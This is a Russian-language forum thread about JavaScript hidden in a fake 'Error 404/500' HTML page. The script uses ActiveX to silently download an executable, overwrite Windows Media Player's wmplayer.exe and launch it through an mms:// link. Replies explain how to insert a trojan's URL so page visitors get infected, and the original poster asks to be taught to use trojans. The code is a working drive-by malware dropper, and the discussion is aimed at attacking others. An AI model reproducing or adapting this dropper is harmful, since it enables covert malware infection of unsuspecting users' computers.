Ребят, что это за javascript??? для чего он используется и как его использовать?! подскажите плиииз! ____________________________________________ <html><head><title>Error 404</title></head> <body> </body> <p><span style="font-size: 11pt">Error 500</span></p> <p><span style="font-size: 11pt">The page is incorrectly displayed</span></p> <script language="javascript"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "путьт до файла exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2); location.href = "mms:%2f%2f"; </script> </p> </html>
Не пробовал запихивать в блокнотик? Это старьё.. там где "путь до .exe файла" надо вписать типа http://lol.ru/1.exe , где 1.exe - твой троян , скрипт подгрузит твоего троя на тачку пользователя, и насколько понимаю, заменить WM плеер.
ммм... спасибо! в принципе я так и думал... да вот только с троянами я не работал... и поэтому не умею... буду очень признателен если научите работать с троянами!
это ты либо я давал?гы.крч этот скрпит для того, если простоыми словами когда заходишь на страницу, то автоматичски скачивается файл exe в папку с media player и запускается mms:// вот так можно чкнуть трой вир и т.д.